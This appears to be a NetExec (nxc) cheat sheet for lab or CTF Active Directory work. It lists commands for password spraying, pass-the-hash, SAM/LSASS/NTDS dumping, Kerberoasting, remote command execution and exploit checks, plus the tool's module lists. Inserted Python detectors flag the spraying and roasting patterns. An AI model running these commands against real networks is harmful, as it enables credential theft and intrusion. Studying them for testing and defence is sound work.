NetExec
NetExec (also known as nxc) is a network service exploitation tool that helps automate the security assessment of large networks. It is based on CrackMapExec, which makes the tool easy to use.
On Kali Linux the tool can be installed with the following command.
sudo apt install netexec -y
If you are on another distribution, check the official NetExec page for installation instructions.
Verify that a user's credentials are valid by authenticating over SMB.
# Basic authentication to check whether the credentials are valid, using NTLM.
nxc smb 10.10.10.10 -u 'user' -p 'password'
# Authentication to check whether the credentials are valid, using Kerberos.
nxc smb dc.domain.htb -u 'user' -p 'password' -k
# Authentication to check whether a Kerberos ticket (.ccache) is valid.
nxc smb dc.domain.htb -u 'user' --use-kcache
# Pass-the-Hash authentication to check whether the NT hash is valid.
nxc smb 10.10.10.10 -u 'user' -H '<NTLM_HASH>'
# Password spraying against a single user, trying a list of passwords.
nxc smb 10.10.10.10 -u 'user' -p passwords.txt --continue-on-success
# Password spraying with a single password against a list of users.
nxc smb 10.10.10.10 -u users.txt -p 'Password01!' --continue-on-success
# Password spraying without brute force: pair line 1 of users with line 1 of passwords, line 2 with line 2, and so on.
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --no-bruteforce
# Brute-force attack with a list of users and a list of passwords (every combination).
nxc smb 10.10.10.10 -u users.txt -p passwords.txt --continue-on-success
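From the defender's side, the list modes above leave two distinct footprints in failed-logon telemetry: one source trying many accounts (spraying, including the paired `--no-bruteforce` mode) and one source hammering one account (brute force). The following is an added example, not code from the NetExec project or this page; the log format is a constructed three-column normalisation (timestamp, source IP, account) of what a 4625 or SMB auth-failure feed would carry, and the thresholds are assumptions to tune per environment.

```python
# Added example (not from the NetExec page): flag spray vs. brute-force patterns
# in failed-logon records. Input format and thresholds are assumptions.
from datetime import datetime, timedelta

# Constructed sample feed: "<ISO timestamp> <source IP> <account>", one failure per line.
SAMPLE_LOG = """\
2024-05-01T10:00:01 10.10.14.5 alice
2024-05-01T10:00:02 10.10.14.5 bob
2024-05-01T10:00:03 10.10.14.5 carol
2024-05-01T10:00:04 10.10.14.5 dave
2024-05-01T10:00:05 10.10.14.5 erin
2024-05-01T10:00:06 10.10.14.5 frank
2024-05-01T10:05:00 10.10.14.9 svc_backup
2024-05-01T10:05:01 10.10.14.9 svc_backup
2024-05-01T10:05:02 10.10.14.9 svc_backup
2024-05-01T10:05:03 10.10.14.9 svc_backup
2024-05-01T10:05:04 10.10.14.9 svc_backup
2024-05-01T11:00:00 10.10.14.20 alice
"""

def parse(text):
    """Turn the constructed feed into (time, source, account) tuples, sorted by time."""
    events = []
    for line in text.splitlines():
        ts, src, user = line.split()
        events.append((datetime.fromisoformat(ts), src, user.lower()))
    return sorted(events)

def detect(events, window=timedelta(minutes=5), spray_users=5, brute_tries=5):
    """Slide a window from every failure and count, per source, distinct accounts
    (spray: -u users.txt) and repeats of the same account (brute: -p passwords.txt).
    Returns {"spray": {source_ip, ...}, "brute": {(source_ip, account), ...}}."""
    spray, brute = set(), set()
    for i, (t0, src, user) in enumerate(events):
        users, tries = set(), 0
        for t, s, u in events[i:]:
            if t - t0 > window:
                break
            if s != src:
                continue
            users.add(u)
            if u == user:
                tries += 1
        if len(users) >= spray_users:
            spray.add(src)
        if tries >= brute_tries:
            brute.add((src, user))
    return {"spray": spray, "brute": brute}
```

A real deployment would key on the 4625 Subject/Network fields rather than this constructed layout, but the windowing logic is the same.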
# Check whether the user is allowed to connect via WinRM (Evil-WinRM).
nxc winrm 10.10.10.10 -u 'user' -p 'password'
# Example output when we DO have access.
❯ nxc winrm 10.10.10.10 -u 'user' -p 'password'
WINRM 10.10.10.10 5985 GZZCOO [*] Windows 10 / Server 2019 Build 17763 (name:GZZCOO) (domain:Gzzcoo)
WINRM 10.10.10.10 5985 GZZCOO [+] Gzzcoo\user:password (Pwn3d!)
# Example output when we do NOT have access.
❯ nxc winrm 10.10.10.10 -u 'user' -p 'password'
WINRM 10.10.10.10 5985 GZZCOO [*] Windows 10 / Server 2019 Build 17763 (name:GZZCOO) (domain:Gzzcoo)
WINRM 10.10.10.10 5985 GZZCOO [-] Gzzcoo\user:password
# Enumerate the SMB shares we have permissions on.
nxc smb 10.10.10.10 -u 'user' -p 'password' --shares
# Build a JSON tree of the SMB share contents to see where the interesting files are.
nxc smb 10.10.10.10 -u 'user' -p 'password' -M spider_plus
# Full enumeration over SMB.
nxc smb 10.10.10.10 -u 'user' -p 'password' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol
# Get domain users through a RID cycling attack if IPC$ is enabled.
nxc smb 10.10.10.10 -u 'user' -p 'password' --rid-brute
# Keep only the usernames from the RID cycling output (lines tagged SidTypeUser).
nxc smb 10.10.10.10 -u 'user' -p 'password' --rid-brute | grep SidTypeUser | rev | awk '{print $2}' | rev | awk '{print $2}' FS='\\'
# List users currently logged on to the host.
nxc smb 10.10.10.10 -u 'user' -p 'password' --loggedon-users
# List active SMB sessions on the host.
nxc smb 10.10.10.10 -u 'user' -p 'password' --sessions
# Download a single file from a share to a local path.
nxc smb 10.10.10.10 -u 'user' -p 'password' --share 'SHARE' --get-file 'FILE_TARGET' 'OUTPUT_FILE'
# Execute a command on the host (requires administrative rights).
nxc smb 10.10.10.10 -u 'user' -p 'password' -x 'whoami'
Dumping SAM
nxc smb 10.10.10.10 -u 'user' -p 'password' --sam
Dumping LSASS
nxc smb 10.10.10.10 -u 'user' -p 'password' --lsa
Dumping NTDS.dit
nxc smb 10.10.10.10 -u 'user' -p 'password' --ntds vss
Through nxc we can carry out the following attacks against the Kerberos protocol.
AS-REP roasting for a single user.
nxc ldap 10.10.10.10 -u 'user' -p '' --asreproast hashes.txt
AS-REP roasting for a list of users.
nxc ldap 10.10.10.10 -u 'user' -p '' --asreproast hashes.txt
# Kerberoasting: request service tickets for accounts with an SPN and save the hashes.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --kerberoasting hashes.txt
If we have credentials, we can use nxc to obtain the .zip or .json files for BloodHound.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --bloodhound -ns 10.10.10.10 --collection All
# Read the gMSA passwords the account has rights to.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --gmsa
# Read the LAPS passwords the account has rights to.
nxc ldap 10.10.10.10 -u 'user' -p 'password' -M laps
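Both roasting modes above stand out in domain controller Kerberos auditing: AS-REP roasting shows up as 4768 TGT requests with pre-authentication type 0 and RC4 ticket encryption, and Kerberoasting as a burst of 4769 service ticket requests with RC4 (etype 0x17) for several non-machine SPNs from one client. The following is an added example, not code from the NetExec project or this page; the event records are constructed dicts mirroring the relevant 4768/4769 fields, and the minimum-services threshold is an assumption.

```python
# Added example (not from the NetExec page): detect AS-REP roasting and
# Kerberoasting patterns in constructed Kerberos audit records.
RC4_HMAC = 0x17   # legacy etype both attacks prefer: its hashes crack fastest
AES256 = 0x12

# Constructed sample records mirroring Windows 4768 (TGT) / 4769 (TGS) fields.
# "preauth" only exists on 4768; 0 means the account has pre-auth disabled.
SAMPLE_EVENTS = [
    {"id": 4768, "ip": "10.10.14.5", "account": "svc_legacy", "service": "krbtgt",
     "preauth": 0, "etype": RC4_HMAC},                          # roastable account
    {"id": 4768, "ip": "10.10.14.5", "account": "jdoe", "service": "krbtgt",
     "preauth": 2, "etype": AES256},                            # normal AES logon
    {"id": 4769, "ip": "10.10.14.5", "account": "jdoe",
     "service": "MSSQLSvc/sql01.corp.local:1433", "etype": RC4_HMAC},
    {"id": 4769, "ip": "10.10.14.5", "account": "jdoe",
     "service": "HTTP/web01.corp.local", "etype": RC4_HMAC},
    {"id": 4769, "ip": "10.10.14.5", "account": "jdoe",
     "service": "WS01$", "etype": RC4_HMAC},                    # machine SPN: not roastable
    {"id": 4769, "ip": "10.10.14.5", "account": "jdoe",
     "service": "CIFS/fs01.corp.local", "etype": AES256},       # AES ticket: benign
    {"id": 4769, "ip": "10.10.14.7", "account": "asmith",
     "service": "HTTP/web01.corp.local", "etype": RC4_HMAC},    # single RC4 request
]

def asrep_roast_candidates(events):
    """Accounts that obtained a TGT with no pre-authentication and an RC4 ticket,
    i.e. exactly what --asreproast harvests. Fix: enable pre-auth on these accounts."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e.get("preauth") == 0 and e["etype"] == RC4_HMAC})

def kerberoast_suspects(events, min_services=2):
    """Client IPs that pulled RC4 service tickets for several distinct user-owned SPNs.
    Machine accounts (name ends in $) and krbtgt are skipped: their keys are random."""
    by_client = {}
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        svc = e["service"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        by_client.setdefault(e["ip"], set()).add(svc)
    return {ip: sorted(s) for ip, s in by_client.items() if len(s) >= min_services}
```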
Enumerate all AD users.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --users
Enumerate only the AD users that are currently enabled.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --active-users
Enumerate AD groups.
nxc ldap 10.10.10.10 -u 'user' -p 'password' --groups
# Check FTP authentication; in this case, test whether the anonymous user is accepted.
nxc ftp 10.10.10.10 -u 'anonymous' -p ''
# List the contents of the FTP server (root, or a given directory).
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --ls
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --ls '<Directorio>'
# Download a file stored on the FTP server.
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --get '<PATH_OF_TARGET_FILE>'
# Upload a file to the FTP server.
nxc ftp 10.10.10.10 -u 'usuario' -p 'password' --put '<path_local_file>' '<destination_path_file>'
Windows Auth
# If SMB is exposed, the domain is resolved automatically.
nxc mssql 10.10.10.10 -u 'user' -p 'password'
# If SMB is not exposed, add -d with the domain name.
nxc mssql 10.10.10.10 -u 'user' -p 'password' -d dominio.htb
Local Auth
# Authenticate with MSSQL credentials rather than Windows credentials.
nxc mssql 10.10.10.10 -u 'user' -p 'password' --local-auth
Specify Port
# If MSSQL listens on a non-default port, specify it with --port.
nxc mssql 10.10.10.10 -u 'user' -p 'password' --port 1234
# Run queries from nxc.
nxc mssql 10.10.10.10 -u 'user' -p 'password' -q 'SELECT name FROM master.dbo.sysdatabases;'
# Run arbitrary OS commands to obtain Remote Code Execution (RCE).
nxc mssql 10.10.10.10 -u 'user' -p 'password' -x whoami
# Check whether the host is vulnerable to ZeroLogon (CVE-2020-1472).
nxc smb 10.10.10.10 -u 'user' -p 'password' -M zerologon
# Check whether the host is vulnerable to EternalBlue MS17-010 (CVE-2017-0144).
nxc smb 10.10.10.10 -u 'user' -p 'password' -M ms17-010
# Check whether the host is vulnerable to PrintNightmare (CVE-2021-1675).
nxc smb 10.10.10.10 -u 'user' -p 'password' -M printnightmare
# Check whether the host is vulnerable to SMBGhost (CVE-2020-0796).
nxc smb 10.10.10.10 -u 'user' -p 'password' -M smbghost
# Check whether the host is vulnerable to noPAC (CVE-2021-42278 and CVE-2021-42287).
nxc smb 10.10.10.10 -u 'user' -p 'password' -M nopac
❯ nxc smb -L
LOW PRIVILEGE MODULES
[*] add-computer Adds or deletes a domain computer
[*] coerce_plus Module to check if the Target is vulnerable to any coerce vulns. Set LISTENER IP for coercion.
[*] dfscoerce [REMOVED] Module to check if the DC is vulnerable to DFSCoerce, credit to @filip_dragovic/@Wh04m1001 and @topotam
[*] drop-sc Drop a searchConnector-ms file on each writable share
[*] enum_av Gathers information on all endpoint protection solutions installed on the the remote host(s) via LsarLookupNames (no privilege needed)
[*] enum_ca Anonymously uses RPC endpoints to hunt for ADCS CAs
[*] gpp_autologin Searches the domain controller for registry.xml to find autologon information and returns the username and password.
[*] gpp_password Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] ms17-010 MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT
[*] nopac Check if the DC is vulnerable to CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
[*] petitpotam [REMOVED] Module to check if the DC is vulnerable to PetitPotam, credit to @topotam
[*] printerbug [REMOVED] Module to check if the Target is vulnerable to PrinterBug. Set LISTENER IP for coercion.
[*] printnightmare Check if host vulnerable to printnightmare
[*] scuffy Creates and dumps an arbitrary .scf file with the icon property containing a UNC path to the declared SMB server against all writeable shares
[*] shadowcoerce [REMOVED] Module to check if the target is vulnerable to ShadowCoerce, credit to @Shutdown and @topotam
[*] slinky Creates windows shortcuts with the icon attribute containing a URI to the specified server (default SMB) in all shares with write permissions
[*] smbghost Module to check for the SMB dialect 3.1.1 and compression capability of the host, which is an indicator for the SMBGhost vulnerability (CVE-2020-0796).
[*] spider_plus List files recursively and save a JSON share-file metadata to the 'OUTPUT_FOLDER'. See module options for finer configuration.
[*] spooler Detect if print spooler is enabled or not
[*] webdav Checks whether the WebClient service is running on the target
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bitlocker Enumerating BitLocker Status on target(s) If it is enabled or disabled.
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] firefox Dump credentials from Firefox
[*] get_netconnections Uses WMI to query network connections.
[*] handlekatz Get lsass dump using handlekatz64 and parse the result with pypykatz
[*] hash_spider Dump lsass recursively from a given hash using BH to find local admins
[*] hyperv-host Performs a registry query on the VM to lookup its HyperV Host
[*] iis Checks for credentials in IIS Application Pool configuration files using appcmd.exe
[*] impersonate List and impersonate tokens to run command as locally logged on users
[*] install_elevated Checks for AlwaysInstallElevated
[*] keepass_discover Search for KeePass-related files and process.
[*] keepass_trigger Set up a malicious KeePass trigger to export the database in cleartext.
[*] lsassy Dump lsass and parse the result remotely with lsassy
[*] masky Remotely dump domain user credentials via an ADCS and a KDC
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] mobaxterm Remotely dump MobaXterm credentials via RemoteRegistry or NTUSER.dat export
[*] mremoteng Dump mRemoteNG Passwords in AppData and in Desktop / Documents folders (digging recursively in them)
[*] msol Dump MSOL cleartext password from the localDB on the Azure AD-Connect Server
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] ntdsutil Dump NTDS with ntdsutil
[*] ntlmv1 Detect if lmcompatibilitylevel on the target is set to lower than 3 (which means ntlmv1 is enabled)
[*] pi Run command as logged on users via Process Injection
[*] powershell_history Extracts PowerShell history for all users and looks for sensitive commands.
[*] procdump Get lsass dump using procdump64 and parse the result with pypykatz
[*] putty Query the registry for users who saved ssh private keys in PuTTY. Download the private keys if found.
[*] rdcman Remotely dump Remote Desktop Connection Manager (sysinternals) credentials
[*] rdp Enables/Disables RDP
[*] reg-query Performs a registry query on the machine
[*] reg-winlogon Collect autologon credential stored in the registry
[*] runasppl Check if the registry value RunAsPPL is set or not
[*] schtask_as Remotely execute a scheduled task as a logged on user
[*] security-questions Gets security questions and answers for users on computer
[*] teams_localdb Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process
[*] test_connection Pings a host
[*] uac Checks UAC status
[*] veeam Extracts credentials from local Veeam SQL Database
[*] vnc Loot Passwords from VNC server and client configurations
[*] wcc Check various security configuration items on Windows machines
[*] wdigest Creates/Deletes the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
[*] wifi Get key of all wireless interfaces
[*] winscp Looks for WinSCP.ini files in the registry and default locations and tries to extract credentials.
❯ nxc wmi -L
LOW PRIVILEGE MODULES
[*] ioxidresolver This module helps you to identify hosts that have additional active interfaces
[*] spooler Detect if print spooler is enabled or not
[*] zerologon Module to check if the DC is vulnerable to Zerologon aka CVE-2020-1472
HIGH PRIVILEGE MODULES (requires admin privs)
[*] bitlocker Enumerating BitLocker Status on target(s) If it is enabled or disabled.
[*] enum_dns Uses WMI to dump DNS from an AD DNS Server
[*] get_netconnections Uses WMI to query network connections.
[*] rdp Enables/Disables RDP
❯ nxc mssql -L
LOW PRIVILEGE MODULES
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec Uses Empire's RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection Pings a host
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
❯ nxc ldap -L
LOW PRIVILEGE MODULES
[*] adcs Find PKI Enrollment Services in Active Directory and Certificate Templates Names
[*] daclread Read and backup the Discretionary Access Control List of objects. Be careful, this module cannot read the DACLS recursively, see more explanation in the options.
[*] enum_trusts Extract all Trust Relationships, Trusting Direction, and Trust Transitivity
[*] find-computer Finds computers in the domain via the provided text
[*] get-desc-users Get description of the users. May contained password
[*] get-network Query all DNS records with the corresponding IP from the domain.
[*] get-unixUserPassword Get unixUserPassword attribute from all users in ldap
[*] get-userPassword Get userPassword attribute from all users in ldap
[*] group-mem Retrieves all the members within a Group
[*] groupmembership Query the groups to which a user belongs.
[*] laps Retrieves all LAPS passwords which the account has read permissions for.
[*] ldap-checker Checks whether LDAP signing and binding are required and / or enforced
[*] maq Retrieves the MachineAccountQuota domain-level attribute
[*] obsolete Extract all obsolete operating systems from LDAP
[*] pre2k Identify pre-created computer accounts, save the results to a file, and obtain TGTs for each
[*] pso Module to get the Fine Grained Password Policy/PSOs
[*] sccm Find a SCCM infrastructure in the Active Directory
[*] subnets Retrieves the different Sites and Subnets of an Active Directory
[*] user-desc Get user descriptions stored in Active Directory
[*] whoami Get details of provided user
HIGH PRIVILEGE MODULES (requires admin privs)